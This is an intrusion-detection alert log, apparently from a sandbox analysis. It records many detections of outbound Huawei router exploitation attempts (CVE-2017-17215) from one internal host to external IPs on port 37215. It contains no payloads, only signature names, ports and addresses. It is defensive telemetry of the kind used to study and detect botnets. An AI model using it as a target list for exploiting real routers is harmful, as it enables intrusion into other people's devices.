                                                        06/13/24-21:32:58.822993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.162.212.96
                                                        06/13/24-21:33:17.340836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231037215192.168.2.14197.244.239.245
                                                        06/13/24-21:32:40.378017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872637215192.168.2.1441.83.150.39
                                                        06/13/24-21:33:09.087009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.1441.145.125.229
                                                        06/13/24-21:32:25.968879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663837215192.168.2.14197.241.167.47
                                                        06/13/24-21:33:09.090232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302237215192.168.2.14156.148.232.249
                                                        06/13/24-21:32:40.371660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223837215192.168.2.1441.35.86.224
                                                        06/13/24-21:32:48.573382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.14156.250.23.27
                                                        06/13/24-21:33:00.871109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909637215192.168.2.1441.220.155.153
                                                        06/13/24-21:33:09.127207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484237215192.168.2.14197.95.206.157
                                                        06/13/24-21:32:54.727152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5303437215192.168.2.14197.63.47.215
                                                        06/13/24-21:32:58.822613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381637215192.168.2.1441.60.121.20
                                                        06/13/24-21:32:23.941623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042237215192.168.2.14197.212.89.116
                                                        06/13/24-21:32:17.671816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131037215192.168.2.1441.86.45.252
                                                        06/13/24-21:32:36.247776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595837215192.168.2.14197.246.139.66
                                                        06/13/24-21:32:21.802832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452837215192.168.2.1441.75.137.44
                                                        06/13/24-21:32:15.629257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742037215192.168.2.14156.220.16.6
                                                        06/13/24-21:32:11.484893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021237215192.168.2.14197.66.133.63
                                                        06/13/24-21:32:13.568198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665437215192.168.2.14197.124.189.93
                                                        06/13/24-21:32:13.545514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629437215192.168.2.14197.175.139.103
                                                        06/13/24-21:33:17.309124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.1441.225.209.141
                                                        06/13/24-21:32:19.751203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349037215192.168.2.14156.110.118.119
                                                        06/13/24-21:33:09.127523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217837215192.168.2.1441.5.78.109
                                                        06/13/24-21:32:30.126293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835637215192.168.2.14156.111.29.234
                                                        06/13/24-21:32:25.971541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266637215192.168.2.14197.232.225.124
                                                        06/13/24-21:32:40.375417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.14197.110.201.231
                                                        06/13/24-21:32:52.658553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074237215192.168.2.1441.207.121.151
                                                        06/13/24-21:32:58.820351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085437215192.168.2.1441.74.76.102
                                                        06/13/24-21:32:01.221070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864837215192.168.2.14197.33.238.134
                                                        06/13/24-21:32:38.316812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713637215192.168.2.14197.99.48.98
                                                        06/13/24-21:32:05.370201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131437215192.168.2.1441.35.18.226
                                                        06/13/24-21:32:36.263760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631437215192.168.2.1441.205.34.59
                                                        06/13/24-21:32:48.569495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417037215192.168.2.14156.245.163.139
                                                        06/13/24-21:33:00.888362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298237215192.168.2.14197.250.7.234
                                                        06/13/24-21:32:46.504246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416837215192.168.2.14156.152.150.177
                                                        06/13/24-21:32:13.545865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551837215192.168.2.14156.235.150.174
                                                        06/13/24-21:32:40.373289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312437215192.168.2.1441.41.133.27
                                                        06/13/24-21:32:01.219409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.14156.57.126.92
                                                        06/13/24-21:33:11.158967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032637215192.168.2.14156.64.47.243
                                                        06/13/24-21:32:36.247330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672837215192.168.2.14156.213.96.172
                                                        06/13/24-21:32:36.248502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113037215192.168.2.1441.161.71.9
                                                        06/13/24-21:32:03.276329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138237215192.168.2.14156.46.54.126
                                                        06/13/24-21:31:57.092916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934437215192.168.2.14197.69.11.105
                                                        06/13/24-21:32:01.238577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927437215192.168.2.1441.247.55.21
                                                        06/13/24-21:33:13.230668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14156.37.144.204
                                                        06/13/24-21:32:15.604543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093837215192.168.2.14156.251.176.139
                                                        06/13/24-21:32:46.504158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464237215192.168.2.14197.176.176.161
                                                        06/13/24-21:32:21.787787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386237215192.168.2.1441.107.16.175
                                                        06/13/24-21:33:05.014597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393037215192.168.2.14197.144.123.39
                                                        06/13/24-21:31:59.173811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600037215192.168.2.14156.119.120.12
                                                        06/13/24-21:33:04.991744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305837215192.168.2.1441.71.152.127
                                                        06/13/24-21:33:15.256077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934837215192.168.2.1441.189.122.133
                                                        06/13/24-21:32:13.546633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657237215192.168.2.14197.37.107.94
                                                        06/13/24-21:32:42.417559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534437215192.168.2.1441.86.243.45
                                                        06/13/24-21:31:57.093591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.14156.125.129.63
                                                        06/13/24-21:32:11.509189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199037215192.168.2.14197.200.236.206
                                                        06/13/24-21:32:44.474945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290837215192.168.2.1441.44.176.143
                                                        06/13/24-21:33:07.041121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162637215192.168.2.14197.2.10.53
                                                        06/13/24-21:31:57.093284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.14156.64.30.138
                                                        06/13/24-21:32:44.477929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240037215192.168.2.14197.12.1.203
                                                        06/13/24-21:32:17.694210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090037215192.168.2.1441.93.55.131
                                                        06/13/24-21:32:30.100164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877037215192.168.2.1441.121.111.72
                                                        06/13/24-21:32:11.488836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173037215192.168.2.14197.240.243.133
                                                        06/13/24-21:32:15.610803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796237215192.168.2.1441.93.131.184
                                                        06/13/24-21:32:09.458174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589037215192.168.2.14197.152.101.240
                                                        06/13/24-21:32:17.695168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293237215192.168.2.14197.118.230.113
                                                        06/13/24-21:32:56.787911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165437215192.168.2.14197.129.224.198
                                                        06/13/24-21:32:46.503849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541837215192.168.2.1441.122.120.141
                                                        06/13/24-21:32:11.488750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14156.45.45.115
                                                        06/13/24-21:32:09.440167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716837215192.168.2.1441.246.1.42
                                                        06/13/24-21:32:03.309609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3385637215192.168.2.14156.133.193.16
                                                        06/13/24-21:33:00.869275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935237215192.168.2.14156.109.225.205
                                                        06/13/24-21:32:19.754794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525437215192.168.2.14156.213.212.104
                                                        06/13/24-21:31:59.175657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.14197.209.113.82
                                                        06/13/24-21:32:09.456330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192037215192.168.2.14197.206.69.22
                                                        06/13/24-21:32:58.838283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755637215192.168.2.1441.24.138.231
                                                        06/13/24-21:33:13.212575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435837215192.168.2.14156.178.3.15
                                                        06/13/24-21:33:00.886658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252037215192.168.2.14197.62.17.79
                                                        06/13/24-21:32:25.994381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512437215192.168.2.14156.11.166.155
                                                        06/13/24-21:32:28.028977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043837215192.168.2.14197.215.150.249
                                                        06/13/24-21:32:52.670439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594237215192.168.2.14197.112.87.111
                                                        06/13/24-21:32:03.279138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073037215192.168.2.1441.46.40.162
                                                        06/13/24-21:32:25.971354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605637215192.168.2.14156.174.54.100
                                                        06/13/24-21:32:52.658816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463837215192.168.2.1441.18.42.65
                                                        06/13/24-21:32:21.805525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569437215192.168.2.1441.51.24.243
                                                        06/13/24-21:32:42.418245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.14197.121.194.182
                                                        06/13/24-21:33:11.175421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782437215192.168.2.14156.231.198.20
                                                        06/13/24-21:32:34.193679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180237215192.168.2.14156.80.104.179
                                                        06/13/24-21:32:48.572726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872437215192.168.2.1441.176.167.214
                                                        06/13/24-21:32:13.544497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872837215192.168.2.14156.27.233.193
                                                        06/13/24-21:32:11.510104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565637215192.168.2.14156.194.11.210
                                                        06/13/24-21:32:21.782810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595637215192.168.2.14156.192.238.209
                                                        06/13/24-21:32:36.269001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479437215192.168.2.1441.144.239.49
                                                        06/13/24-21:33:07.054971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331237215192.168.2.1441.125.128.182
                                                        06/13/24-21:33:09.089041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403837215192.168.2.14197.179.182.55
                                                        06/13/24-21:32:03.294241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803037215192.168.2.1441.231.104.109
                                                        06/13/24-21:33:00.887526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077237215192.168.2.14156.212.25.190
                                                        06/13/24-21:33:15.254864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.1441.178.202.21
                                                        06/13/24-21:33:11.158531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748437215192.168.2.14156.52.172.209
                                                        06/13/24-21:32:21.785769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536037215192.168.2.14156.206.219.142
                                                        06/13/24-21:32:52.669952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885637215192.168.2.14197.192.84.189
                                                        06/13/24-21:32:38.317684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068037215192.168.2.14197.200.206.43
                                                        06/13/24-21:32:28.025583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060037215192.168.2.1441.66.251.209
                                                        06/13/24-21:32:07.416975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198837215192.168.2.14197.77.250.52
                                                        06/13/24-21:32:38.302218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026237215192.168.2.14156.197.4.43
                                                        06/13/24-21:33:07.039332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239237215192.168.2.1441.19.86.53
                                                        06/13/24-21:32:03.306380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709837215192.168.2.14156.6.81.141
                                                        06/13/24-21:32:40.357379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028437215192.168.2.1441.85.193.179
                                                        06/13/24-21:32:30.123580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975437215192.168.2.14156.91.200.109
                                                        06/13/24-21:32:50.612092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809837215192.168.2.1441.201.20.100
                                                        06/13/24-21:32:01.240008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520037215192.168.2.14197.64.1.53
                                                        06/13/24-21:33:13.228511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.14156.92.181.168
                                                        06/13/24-21:32:07.400974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381237215192.168.2.14197.8.31.57
                                                        06/13/24-21:32:30.099204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336637215192.168.2.14197.196.150.95
                                                        06/13/24-21:33:05.011370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835437215192.168.2.14197.73.174.205
                                                        06/13/24-21:33:09.107070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336637215192.168.2.14156.193.71.162
                                                        06/13/24-21:32:11.508321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609037215192.168.2.14197.174.143.130
                                                        06/13/24-21:33:02.908611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643837215192.168.2.14156.45.126.118
                                                        06/13/24-21:32:56.755217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448637215192.168.2.1441.54.48.158
                                                        06/13/24-21:32:23.929186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258237215192.168.2.14197.213.198.162
                                                        06/13/24-21:32:05.344643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982837215192.168.2.1441.157.127.83
                                                        06/13/24-21:32:05.376476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207637215192.168.2.14156.82.24.164
                                                        06/13/24-21:32:42.422635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.14197.210.99.31
                                                        06/13/24-21:32:19.730152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3657437215192.168.2.14197.72.114.137
                                                        06/13/24-21:33:04.991637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087637215192.168.2.1441.36.123.22
                                                        06/13/24-21:32:32.156257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266637215192.168.2.1441.9.70.71
                                                        06/13/24-21:32:19.754281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834037215192.168.2.1441.50.44.243
                                                        06/13/24-21:32:09.439828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630837215192.168.2.1441.70.14.221
                                                        06/13/24-21:32:01.239629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473637215192.168.2.1441.133.157.144
                                                        06/13/24-21:33:17.304952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256037215192.168.2.14156.237.213.152
                                                        06/13/24-21:32:44.477640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860037215192.168.2.14197.148.59.255
                                                        06/13/24-21:32:15.609409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441437215192.168.2.1441.0.62.123
                                                        06/13/24-21:32:13.564832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572037215192.168.2.14156.53.6.103
                                                        06/13/24-21:32:42.424255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538637215192.168.2.14197.164.191.81
                                                        06/13/24-21:32:25.991349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586237215192.168.2.1441.131.200.72
                                                        06/13/24-21:32:23.945699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856437215192.168.2.14197.130.199.102
                                                        06/13/24-21:32:09.438592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.14156.71.10.215
                                                        06/13/24-21:33:13.212350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006237215192.168.2.1441.159.4.176
                                                        06/13/24-21:32:40.357878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093437215192.168.2.1441.18.214.61
                                                        06/13/24-21:33:04.991862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580237215192.168.2.1441.155.33.231
                                                        06/13/24-21:33:00.869322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757037215192.168.2.14197.11.134.154
                                                        06/13/24-21:33:11.157622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878637215192.168.2.1441.250.133.217
                                                        06/13/24-21:32:38.301062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536237215192.168.2.14197.254.215.170
                                                        06/13/24-21:32:01.220078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066437215192.168.2.1441.253.1.253
                                                        06/13/24-21:32:07.401959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916237215192.168.2.14156.161.180.80
                                                        06/13/24-21:32:48.550943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5298437215192.168.2.14156.239.54.92
                                                        06/13/24-21:32:54.726843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077637215192.168.2.14156.85.45.5
                                                        06/13/24-21:32:50.610712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729237215192.168.2.14156.157.38.120
                                                        06/13/24-21:32:15.611516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680237215192.168.2.1441.224.35.217
                                                        06/13/24-21:32:01.240294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543037215192.168.2.14197.191.248.144
                                                        06/13/24-21:32:52.657255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280037215192.168.2.1441.167.92.219
                                                        06/13/24-21:32:01.221328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962237215192.168.2.14156.248.189.91
                                                        06/13/24-21:31:57.093976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330437215192.168.2.14156.33.213.35
                                                        06/13/24-21:32:44.476805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965237215192.168.2.14156.118.139.58
                                                        06/13/24-21:32:07.401098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164037215192.168.2.14197.194.190.179
                                                        06/13/24-21:33:00.884351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479237215192.168.2.1441.146.179.177
                                                        06/13/24-21:32:42.408053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627237215192.168.2.14156.84.114.144
                                                        06/13/24-21:32:07.402706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.14197.247.1.234
                                                        06/13/24-21:33:00.867376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652837215192.168.2.14156.245.228.153
                                                        06/13/24-21:32:09.458509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913237215192.168.2.1441.84.165.251
                                                        06/13/24-21:32:34.194325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017837215192.168.2.1441.132.129.27
                                                        06/13/24-21:33:15.271656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195437215192.168.2.14197.142.92.135
                                                        06/13/24-21:32:21.781977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535237215192.168.2.14197.208.206.23
                                                        06/13/24-21:32:56.792167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443837215192.168.2.14156.253.246.60
                                                        06/13/24-21:31:57.090839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217437215192.168.2.14156.109.0.55
                                                        06/13/24-21:32:44.450735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.14197.13.174.94
                                                        06/13/24-21:32:13.544958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747237215192.168.2.14156.227.178.210
                                                        06/13/24-21:33:07.041655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121037215192.168.2.14156.20.59.221
                                                        06/13/24-21:33:15.257971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656037215192.168.2.14156.215.161.146
                                                        06/13/24-21:32:50.613304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774637215192.168.2.14197.48.175.206
                                                        06/13/24-21:33:11.177562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624437215192.168.2.14197.219.197.147
                                                        06/13/24-21:32:28.027594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703437215192.168.2.14156.0.168.109
                                                        06/13/24-21:31:59.177214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450437215192.168.2.14156.252.191.201
                                                        06/13/24-21:31:57.131314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940237215192.168.2.1441.189.207.71
                                                        06/13/24-21:32:23.833753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395437215192.168.2.1441.3.5.34
                                                        06/13/24-21:32:17.676337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508037215192.168.2.14156.208.29.243
                                                        06/13/24-21:32:38.302379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893237215192.168.2.14156.166.185.34
                                                        06/13/24-21:32:48.552588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253237215192.168.2.1441.229.100.232
                                                        06/13/24-21:32:36.246136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945237215192.168.2.14156.27.193.72
                                                        06/13/24-21:33:00.871835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703037215192.168.2.14156.60.52.176
                                                        06/13/24-21:33:15.257463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254437215192.168.2.14156.24.127.164
                                                        06/13/24-21:32:40.356123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785637215192.168.2.14156.218.190.95
                                                        06/13/24-21:32:19.730306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380237215192.168.2.14156.39.177.163
                                                        06/13/24-21:32:19.752136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.14197.233.232.60
                                                        06/13/24-21:32:23.932129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846637215192.168.2.1441.20.67.35
